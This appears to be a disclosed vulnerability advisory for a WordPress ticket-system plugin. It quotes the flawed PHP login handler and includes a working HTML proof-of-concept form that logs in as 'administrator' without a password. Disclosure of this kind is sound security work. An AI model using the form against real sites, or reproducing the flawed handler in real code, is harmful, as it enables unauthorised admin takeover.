You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
File: wp-support-plus-responsive-ticket-system\includes\admin\loginGuestFacebook.php
<?php
if($_POST['email']=='') die();
$user_id = username_exists( $_POST['username'] );
if(!$user_id){
$user_id=email_exists($_POST['email']);
if(!$user_id){
$random_password = wp_generate_password( $length=12, $include_standard_special_chars=false );
$user_id= wp_create_user( $_POST['username'], $random_password, $_POST['email'] );
$full_name=explode(' ', $_POST['name']);
$firstName=(isset($full_name[0]))?$full_name[0]:'';
$lastName=(isset($full_name[1]))?$full_name[1]:'';
wp_update_user(
array(
'ID' => $user_id,
'first_name'=>$firstName,
'last_name'=>$lastName,
'display_name' => $_POST['name'],
'role' => 'subscriber'
)
);
}
}
$user_info = get_userdata($user_id);
if ( !is_user_logged_in() ) {
wp_set_current_user( $user_id, $user_info->user_login );
wp_set_auth_cookie( $user_id );
do_action( 'wp_login', $user_info->user_login );
}
?>Proof of Concept
Use form below:
<form method="post" action="http://wp/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Then you can go to admin panel.
Timeline
- 06-12-2016: Discovered
- 06-12-2016: Cannot contact with vendor
- 08-01-2017: Version 8.0.0 released, issue resolved